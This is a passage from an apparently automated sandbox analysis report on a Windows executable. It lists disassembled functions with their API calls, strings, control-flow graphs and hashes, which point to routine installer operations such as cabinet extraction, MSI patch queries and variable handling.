                                                                                                                                                                                                                                                                                                  • Opcode ID: ab70956721e0a814e96e943eade4e6aeb614c28fe854b66e1d6268a6a0581af4
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5f3872b5fed861f540336f9fa992cfd92bb0651d482225fc7b08f2e93164d5c9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab70956721e0a814e96e943eade4e6aeb614c28fe854b66e1d6268a6a0581af4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E41B976180241AFDB219F999C49F5B7FA6FBC5B20F21C91DF9189B281D771C801DBA0
                                                                                                                                                                                                                                                                                                  Function 00602AF7 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 79libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1085 602af7-602b17 call 5c3838 1088 602c21-602c25 1085->1088 1089 602b1d-602b2b call 604a6c 1085->1089 1091 602c27-602c2a call 605636 1088->1091 1092 602c2f-602c35 1088->1092 1093 602b30-602b4f GetProcAddress 1089->1093 1091->1092 1095 602b51 1093->1095 1096 602b56-602b6f GetProcAddress 1093->1096 1095->1096 1097 602b71 1096->1097 1098 602b76-602b8f GetProcAddress 1096->1098 1097->1098 1099 602b91 1098->1099 1100 602b96-602baf GetProcAddress 1098->1100 1099->1100 1101 602bb1 1100->1101 1102 602bb6-602bcf GetProcAddress 1100->1102 1101->1102 1103 602bd1 1102->1103 1104 602bd6-602bef GetProcAddress 1102->1104 1103->1104 1105 602bf1 1104->1105 1106 602bf6-602c10 GetProcAddress 1104->1106 1105->1106 1107 602c12 1106->1107 1108 602c17 1106->1108 1107->1108 1108->1088
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C3838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C3877
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C3838: GetLastError.KERNEL32 ref: 005C3881
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00604A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00604A9D
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00602B41
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00602B61
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00602B81
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00602BA1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00602BC1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00602BE1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00602C01
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$ErrorLast$DirectorySystem
                                                                                                                                                                                                                                                                                                  • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                                                                                                                                                                                                                                                                  • API String ID: 2510051996-1735120554
                                                                                                                                                                                                                                                                                                  • Opcode ID: 71084ec2afe1603162761e9444f4551f9e83b4edea7a821bd81f48d9c4376e1e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 30053c6e81d29cb45a27a4d71a102935f64f189afc528bc44f2c1667d17e8ebc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71084ec2afe1603162761e9444f4551f9e83b4edea7a821bd81f48d9c4376e1e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15311A70981E19EFDB219F20ED15B567BA7F711348F01712AE4045A6B0E7B10846EF54
                                                                                                                                                                                                                                                                                                  Function 0060304F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153libraryloadercomCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1109 60304f-603073 GetModuleHandleA 1110 603075-60307f GetLastError 1109->1110 1111 6030a8-6030b9 GetProcAddress 1109->1111 1112 603081-60308a 1110->1112 1113 60308c 1110->1113 1114 6030bb-6030df GetProcAddress * 3 1111->1114 1115 6030fc 1111->1115 1112->1113 1117 603093-6030a3 call 5c3821 1113->1117 1118 60308e 1113->1118 1119 6030e1-6030e3 1114->1119 1120 6030f8-6030fa 1114->1120 1116 6030fe-60311b CoCreateInstance 1115->1116 1122 6031b1-6031b3 1116->1122 1123 603121-603123 1116->1123 1130 6031c7-6031cc 1117->1130 1118->1117 1119->1120 1121 6030e5-6030e7 1119->1121 1120->1116 1121->1120 1125 6030e9-6030f6 1121->1125 1127 6031b5-6031bc 1122->1127 1128 6031c6 1122->1128 1126 603128-603138 1123->1126 1125->1116 1131 603142 1126->1131 1132 60313a-60313e 1126->1132 1127->1128 1142 6031be-6031c0 ExitProcess 1127->1142 1128->1130 1133 6031d4-6031d9 1130->1133 1134 6031ce-6031d0 1130->1134 1138 603144-603154 1131->1138 1132->1126 1136 603140 1132->1136 1139 6031e1-6031e8 1133->1139 1140 6031db-6031dd 1133->1140 1134->1133 1141 60315c 1136->1141 1143 603166-60316a 1138->1143 1144 603156-60315a 1138->1144 1140->1139 1141->1143 1145 603195-6031a6 1143->1145 1146 60316c-60317f call 6031eb 1143->1146 1144->1138 1144->1141 1145->1122 1149 6031a8-6031af 1145->1149 1146->1122 1151 603181-603193 1146->1151 1149->1122 1151->1122 1151->1145
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00603609,00000000,?,00000000), ref: 00603069
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,005EC025,?,005C5405,?,00000000,?), ref: 00603075
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006030B5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006030C1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 006030CC
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006030D6
                                                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(0062B6B8,00000000,00000001,0060B818,?,?,?,?,?,?,?,?,?,?,?,005EC025), ref: 00603111
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 006031C0
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                                                                                                                                                                                                                                                  • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2124981135-499589564
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4786c071a778e645bc3c0fc349ec07b509a6f7b34595e9f87c154566347d090e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7b5d3ef42dfb849652d0857cc133c666d9ac56eca52a9ea2b578ed21cfa31e70
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4786c071a778e645bc3c0fc349ec07b509a6f7b34595e9f87c154566347d090e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B941A931A81635ABDB289FA4C855BAF77AAEF48711F1140A9F901E7390D771DF018B90
                                                                                                                                                                                                                                                                                                  Function 005E1741 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1153 5e1741-5e1761 call 5c2195 1156 5e176d-5e177f CreateEventW 1153->1156 1157 5e1763-5e1768 1153->1157 1159 5e17b9-5e17c5 CreateEventW 1156->1159 1160 5e1781-5e178b GetLastError 1156->1160 1158 5e1859-5e1860 call 600237 1157->1158 1175 5e1861-5e1867 1158->1175 1164 5e17fc-5e1811 CreateThread 1159->1164 1165 5e17c7-5e17d1 GetLastError 1159->1165 1162 5e178d-5e1796 1160->1162 1163 5e1798 1160->1163 1162->1163 1169 5e179f-5e17b4 call 5c3821 1163->1169 1170 5e179a 1163->1170 1167 5e1848-5e1852 call 5e14e1 1164->1167 1168 5e1813-5e181d GetLastError 1164->1168 1171 5e17de 1165->1171 1172 5e17d3-5e17dc 1165->1172 1167->1175 1185 5e1854 1167->1185 1176 5e181f-5e1828 1168->1176 1177 5e182a 1168->1177 1169->1158 1170->1169 1173 5e17e5-5e17fa call 5c3821 1171->1173 1174 5e17e0 1171->1174 1172->1171 1173->1158 1174->1173 1176->1177 1181 5e182c 1177->1181 1182 5e1831-5e1846 call 5c3821 1177->1182 1181->1182 1182->1158 1185->1158
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,005CC3EB,?,00000000,?,005CC47F), ref: 005E1778
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005CC3EB,?,00000000,?,005CC47F,005C5405,?,?,005C5445,005C5445,00000000,?,00000000), ref: 005E1781
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateErrorEventLast
                                                                                                                                                                                                                                                                                                  • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 545576003-938279966
                                                                                                                                                                                                                                                                                                  • Opcode ID: 27575f540064f1c249b82953f3971818954abc684335b164f66a712fcf82a1a3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5776d1c0363cafc1b9189158e48d8adebb82d2e10279578abe4e02617af620c6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27575f540064f1c249b82953f3971818954abc684335b164f66a712fcf82a1a3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94213873D81A7776D32516E64C45F6B6E5DFF00BA0B034625BD81BB280E770DC4081E9
                                                                                                                                                                                                                                                                                                  Function 005FFCAE Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 76libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1189 5ffcae-5ffcc9 call 5c3824 1192 5ffccb-5ffcef GetProcAddress * 2 1189->1192 1193 5ffcf1 1189->1193 1194 5ffcf6-5ffcfd 1192->1194 1193->1194 1195 5ffcff-5ffd01 1194->1195 1196 5ffd07-5ffd1a call 5c3824 1194->1196 1195->1196 1197 5ffdae 1195->1197 1199 5ffdb8-5ffdbc 1196->1199 1201 5ffd20-5ffd39 GetProcAddress 1196->1201 1197->1199 1202 5ffd6c-5ffd85 GetProcAddress 1201->1202 1203 5ffd3b-5ffd3d 1201->1203 1202->1197 1205 5ffd87-5ffd89 1202->1205 1203->1202 1204 5ffd3f-5ffd49 GetLastError 1203->1204 1206 5ffd4b-5ffd54 1204->1206 1207 5ffd56 1204->1207 1205->1197 1208 5ffd8b-5ffd95 GetLastError 1205->1208 1206->1207 1209 5ffd5d-5ffd5e 1207->1209 1210 5ffd58 1207->1210 1211 5ffd97-5ffda0 1208->1211 1212 5ffda2 1208->1212 1213 5ffd60-5ffd6a call 5c3821 1209->1213 1210->1209 1211->1212 1214 5ffda9-5ffdac 1212->1214 1215 5ffda4 1212->1215 1213->1199 1214->1213 1215->1214
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 005FFCD6
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(SystemFunction041), ref: 005FFCE8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 005FFD2B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 005FFD3F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 005FFD77
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 005FFD8B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4214558900-3191127217
                                                                                                                                                                                                                                                                                                  • Opcode ID: 84f7c46bf78c292b6f90e3728d3c80f52f433aa84425d4a79d4dafe41093b298
                                                                                                                                                                                                                                                                                                  • Instruction ID: 80ccdda3a53e04b80fae32fb414ee2dbccdd4d1d1920e4b905c04aa321aa61b7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84f7c46bf78c292b6f90e3728d3c80f52f433aa84425d4a79d4dafe41093b298
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16216232981A3A9AC7319F55BD0572A6E92FF00B50F067135BE00FE661E7789C019FA4
                                                                                                                                                                                                                                                                                                  Function 005E08C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 005E08F2
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 005E090A
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 005E090F
                                                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 005E0912
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 005E091C
                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 005E098B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 005E0998
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • <the>.cab, xrefs: 005E08EB
                                                                                                                                                                                                                                                                                                  • Failed to add virtual file pointer for cab container., xrefs: 005E0971
                                                                                                                                                                                                                                                                                                  • Failed to duplicate handle to cab container., xrefs: 005E094A
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 005E0940, 005E09BC
                                                                                                                                                                                                                                                                                                  • Failed to open cabinet file: %hs, xrefs: 005E09C9
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                                                                                                                                                                                                  • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3030546534-3446344238
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1d7a08dbf53441a6ff85023bba511c444ba8a738be3bfb50ad8e6da7bd00762c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3a4f337cf73bbcc935580920b75975cecb18ef15383d15ecf67ba6d815040ceb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d7a08dbf53441a6ff85023bba511c444ba8a738be3bfb50ad8e6da7bd00762c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57312472982536BBEB215B968C09F9F7E6AFF04760F115111FD44F7292D7A09D4086E0
                                                                                                                                                                                                                                                                                                  Function 005D3F9B Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005D3AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,005D3FB5,feclient.dll,?,00000000,?,?,?,005C4B12), ref: 005D3B42
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,005C4B12,?,?,0060B488,?,00000001,00000000,00000000), ref: 005D404C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseSleep
                                                                                                                                                                                                                                                                                                  • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2834455192-2673269691
                                                                                                                                                                                                                                                                                                  • Opcode ID: c2b931464498dae2910f38d79025c477bdb3b5091f98eeaa64ab20254eab35d6
                                                                                                                                                                                                                                                                                                  • Instruction ID: e9dc7a6eda8921efc23d8ab3ca11d8ccc9b466fed1f1d18a7ebfa97352f2d944
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2b931464498dae2910f38d79025c477bdb3b5091f98eeaa64ab20254eab35d6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2061B271A00616ABDB359FA8CC4AB6A7FA9FF10340F09455BF901DB350E770DE90DA91
                                                                                                                                                                                                                                                                                                  Function 005C6DB9 Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 166COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000001,?,00000000,005C5445,00000006,?,005C82B9,?,?,?,00000000,00000000,00000001), ref: 005C6DC8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C56A9: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,005C6595,005C6595,?,005C563D,?,?,00000000), ref: 005C56E5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C56A9: GetLastError.KERNEL32(?,005C563D,?,?,00000000,?,?,005C6595,?,005C7F02,?,?,?,?,?), ref: 005C5714
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,005C82B9), ref: 005C6F59
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 005C6F6B
                                                                                                                                                                                                                                                                                                  • Unsetting variable '%ls', xrefs: 005C6F15
                                                                                                                                                                                                                                                                                                  • Attempt to set built-in variable value: %ls, xrefs: 005C6E56
                                                                                                                                                                                                                                                                                                  • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 005C6ED0
                                                                                                                                                                                                                                                                                                  • Setting hidden variable '%ls', xrefs: 005C6E86
                                                                                                                                                                                                                                                                                                  • Setting string variable '%ls' to value '%ls', xrefs: 005C6EED
                                                                                                                                                                                                                                                                                                  • Setting numeric variable '%ls' to value %lld, xrefs: 005C6EFA
                                                                                                                                                                                                                                                                                                  • Failed to insert variable '%ls'., xrefs: 005C6E0D
                                                                                                                                                                                                                                                                                                  • Failed to find variable value '%ls'., xrefs: 005C6DE3
                                                                                                                                                                                                                                                                                                  • Failed to set value of variable: %ls, xrefs: 005C6F41
                                                                                                                                                                                                                                                                                                  • variable.cpp, xrefs: 005C6E4B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                                                                                                                                                                                                                                                  • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2716280545-445000439
                                                                                                                                                                                                                                                                                                  • Opcode ID: f534a2df149c95e17446b2515e6eabd30e5c0e8c497daafbe0e7faa28dd27caa
                                                                                                                                                                                                                                                                                                  • Instruction ID: ac87d99e26266bd307b9b6d2f35c629fbb7be17d5bd0187ecaa53b1cb262018d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f534a2df149c95e17446b2515e6eabd30e5c0e8c497daafbe0e7faa28dd27caa
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A451C1B1A80225AFDB349F99CC4AF6B3FA9FF95710F11051EF845562C2C275DE40CAA1
                                                                                                                                                                                                                                                                                                  Function 005C4AE5 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • IsWindow.USER32(?), ref: 005C4C64
                                                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005C4C75
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to query registration., xrefs: 005C4BAE
                                                                                                                                                                                                                                                                                                  • Failed while running , xrefs: 005C4C2A
